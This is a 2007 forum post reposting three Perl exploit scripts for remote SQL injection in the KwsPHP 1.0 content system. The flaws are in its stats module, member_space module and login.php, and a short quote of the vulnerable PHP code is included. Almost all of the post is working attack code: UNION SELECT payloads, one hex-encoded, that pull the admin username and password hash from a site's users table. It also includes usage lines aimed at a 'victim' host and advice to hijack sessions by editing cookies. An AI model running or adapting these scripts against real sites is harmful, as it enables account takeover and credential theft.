Ras Posted September 16, 2007 Report Posted September 16, 2007 stats module:#################################################### Script..........................: KwsPHP ver 1.0 stats Module# Script Site..................: [url]http://kws.koogar.org/[/url]# Vulnerability...............: Remote SQL injection Exploit# Access.........................: Remote# level.............................: Dangerous# Author..........................: S4mi# Contact.........................: S4mi[at]LinuxMail.org#####################################################Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, E.chark, r0_0t, ddx39###################################################### This Exploit Work Only When magic_quotes_gpc Is OFF##Usage : C:\Xploit.pl 127.0.0.1 /KswPHP/ admin#Result Screen Shot :#+**********************+# Connecting ...[OK]# Sending Data ...[OK]## + Exploit succeed! Getting admin information.# + ---------------- +# + Username: admin# + Password: e10adc3949ba59abbe56e057f20f883e####################################################vuln code : \modules\stats\index.php line ~ 700 - 720#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~# [code]# elseif(isset($aff) && ($aff=="browser"))# {# if(isset($typenav))# {# bloc_head("Statistiques des navigateurs ".$liste_navigateurs[$typenav]);# # $tot_nav=0;# # $requete=reqmysql("SELECT SUM(hit) as tot FROM `stats` where type='nav' and valeur like '$typenav**%' ORDER BY `type` ASC ");# # while ($ligne = mysql_fetch_object($requete))# {# $tot_nav = $ligne->tot;# }# $requete=reqmysql("SELECT * FROM `stats` where type='nav' and valeur like '$typenav**%' ORDER BY `hit` DESC");# ##########################################################!/usr/bin/perluse IO::Socket ;&header();&usage unless(defined($ARGV[0] && $ARGV[1] && $ARGV[2]));$host = $ARGV[0];$path = $ARGV[1];$user = $ARGV[2];syswrite STDOUT ,"\n Connecting ...";my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);die "\n Unable to connect to $host\n" unless($sock);syswrite STDOUT, "[OK]";$inject = "9999'/**/UNION/**/SELECT/**/0,0,pass,pseudo/**/FROM/**/users/**/WHERE/**/pseudo='$user'/*"; syswrite STDOUT ,"\n Sending Data ...";print $sock "POST $path/index.php?mod=stats&aff=browser&typenav=$inject HTTP/1.1\n";print $sock "Host: $host\n";print $sock "Referer: $host\n";print $sock "Accept-Language: en-us\n";print $sock "Content-Type: application/x-www-form-urlencoded\n";print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";print $sock "Cache-Control: no-cache\n";print $sock "Connection: Close\n\n";syswrite STDOUT ,"[OK]\n\n";while($answer = <$sock>){if ($answer =~ /nav_(.*?).png/){print "+ Exploit succeed! Getting admin information.\n";print "+ ---------------- +\n";print "+ Username: $user\n";print "+ Password: $1\n";print "+ ----Have Fun---- +\n";print "+ You don't need to crack the hash password \n";print "+ Just login with ur owen information and edit the cookies\n";}}sub usage{ print "\nUsage : perl $0 host /path/ UserName "; print "\nExemple : perl $0 www.victim.com /KwsPHP/ admin\n"; exit(0);}sub header(){print q(~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~# Script......................: KwsPHP ver 1.0 stats Module# Script Site.................: http://kws.koogar.org/# Vulnerability...............: Remote SQL injection Exploit# Access......................: Remote# level.......................: Dangerous# Author......................: S4mi# Contact.....................: S4mi[at]LinuxMail.org~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~);} member_space module:#!/usr/bin/perluse LWP::UserAgent;use HTTP::Cookies;$host = $ARGV[0];$User = $ARGV[1];$passwd = $ARGV[2];$url = "http://".$host;$port = "80"; print q(################################################################# Script....................: KwsPHP v1.0 Member_Space Module ## Script Site...............: [url]http://kws.koogar.org/[/url] ## Vulnerability.............: Remote SQL injection Exploit ## Access....................: Remote ## level.....................: Dangerous ## Author....................: S4mi ## Contact...................: S4mi[at]LinuxMail.org ## This Exploit Work Only When magic_quotes_gpc Is OFF #################### (C)oded By S4mi ############################); if (@ARGV < 3) { print " # usage : xpl.pl host/path/ User Passwd\n"; print " # e.g : xpl.pl 127.0.0.1/KwsPHP/ zaz luks\n"; exit(); } print " [~] User/Password : $User/$passwd \n"; print " [~] Host : $url \n"; $xpl = LWP::UserAgent->new() or die; $cookie_jar = HTTP::Cookies->new(); print " [~] Logining ...\n"; $xpl->cookie_jar( $cookie_jar ); $login = $xpl->post($url.'index.php', Content => [ "pseudo" => "$User", "pass" => "$passwd", "submit" => "Se connecter", ],);$evil0 = "\x39\x39\x39\x39\x39\x27\x2F\x2A\x2A\x2F\x55\x4E\x49\x4F\x4E" ."\x2F\x2A\x2A\x2F\x53\x45\x4C\x45\x43\x54\x2F\x2A\x2A\x2F\x6E" ."\x75\x6C\x6C\x2C\x63\x6F\x6E\x63\x61\x74\x28\x63\x68\x61\x72" ."\x28\x31\x31\x37\x2C\x31\x31\x35\x2C\x31\x30\x31\x2C\x31\x31" ."\x34\x2C\x31\x31\x30\x2C\x39\x37\x2C\x31\x30\x39\x2C\x31\x30" ."\x31\x2C\x35\x38\x29\x2C\x70\x73\x65\x75\x64\x6F\x2C\x63\x68" ."\x61\x72\x28\x31\x32\x37\x29\x29\x2C\x63\x6F\x6E\x63\x61\x74" ."\x28\x63\x68\x61\x72\x28\x31\x31\x32\x2C\x39\x37\x2C\x31\x31" ."\x35\x2C\x31\x31\x35\x2C\x31\x31\x39\x2C\x31\x31\x31\x2C\x31" ."\x31\x34\x2C\x31\x30\x30\x2C\x35\x38\x29\x2C\x70\x61\x73\x73" ."\x2C\x63\x68\x61\x72\x28\x31\x32\x37\x29\x29\x2C\x6E\x75\x6C" ."\x6C\x2F\x2A\x2A\x2F\x46\x52\x4F\x4D\x2F\x2A\x2A\x2F\x75\x73" ."\x65\x72\x73\x2F\x2A\x2A\x2F\x57\x48\x45\x52\x45\x2F\x2A\x2A" ."\x2F\x69\x64\x3D\x31\x2F\x2A";$offset = "\x65\x73\x70\x61\x63\x65\x5F\x6D\x65\x6D\x62\x72\x65\x26\x61" ."\x63\x3D\x63\x61\x72\x6E\x65\x74\x26\x61\x63\x74\x3D\x65\x64" ."\x69\x74\x65\x72\x26\x69\x64\x3D";$target = $xpl->get($url."index.php?mod=$offset$evil0");if($target->as_string =~ /value="username:(.*?"/) {$zaz = $1;print " [+] Exploit succeed! Getting admin information. \n";print " [+] ------------------------------------------- \n";}if($target->as_string =~ /value="password:(.*?"/) {$luks = $1;print " [+] UserName : $zaz \n";print " [+] Password : $luks \n";}else {print " [-] Exploit Failed ! \n";}print "\n#############################################################\n";login.php:#################################################### Script..........................: KwsPHP ver 1.0# Script Site..................: [url]http://kws.koogar.org/[/url]# Vulnerability...............: login.php Remote SQL injection Exploit# Access.........................: Remote# level.............................: Dangerous# Author..........................: S4mi# Contact.........................: S4mi[at]LinuxMail.org#####################################################Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, E.chark, r0_0t, ddx39###################################################### This Exploit work Only When magic_quotes_gpc Is OFF##Usage : C:\Xploit.pl 127.0.0.1 /KswPHP/ admin#Result Screen Shot :#+**********************+# Connecting ...[OK]# Sending Data ...[OK]## + Exploit succeed! Getting admin information.# + ---------------- +# + Username: admin# + Password: e10adc3949ba59abbe56e057f20f883e####################################################!/usr/bin/perluse IO::Socket ;&header();&usage unless(defined($ARGV[0] && $ARGV[1] && $ARGV[2]));$host = $ARGV[0];$path = $ARGV[1];$user = $ARGV[2];syswrite STDOUT ,"\n Connecting ...";my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);die "\n Unable to connect to $host\n" unless($sock);syswrite STDOUT, "[OK]";$inject = "union%20all%20select%200,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users%20where%20pseudo='$user'/*&pass=ZAZ&verifer=Se%20Loguer"; syswrite STDOUT ,"\n Sending Data ...";print $sock "POST $path/login.php?pseudo=%22$inject HTTP/1.1\n";print $sock "Host: $host\n";print $sock "Referer: $host\n";print $sock "Accept-Language: en-us\n";print $sock "Content-Type: application/x-www-form-urlencoded\n";print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";print $sock "Cache-Control: no-cache\n";print $sock "Connection: Close\n\n";syswrite STDOUT ,"[OK]\n\n";while($answer = <$sock>){if ($answer =~ /class="messagelogin">(.*?) /){print "+ Exploit succeed! Getting admin information.\n";print "+ ----------------------- +\n";print "+ Username: $user\n";print "+ Password: $1\n";print "+ -------Have Fun--------- +\n";print "+ You don't need to crack the hash password \n";print "+ Just login with ur owen information and edit the cookies\n";}}sub usage{ print "\nUsage : perl $0 host /path/ UserName "; print "\nExemple : perl $0 [url]www.victim.com[/url] /KwsPHP/ admin\n"; exit(0);}sub header(){print q(~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~# Script......................: KwsPHP ver 1.0# Script Site.................: [url]http://kws.koogar.org/[/url]# Vulnerability...............: Remote SQL injection Exploit# Access......................: Remote# level.......................: Dangerous# Author......................: S4mi# Contact.....................: S4mi[at]LinuxMail.org~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~);} Quote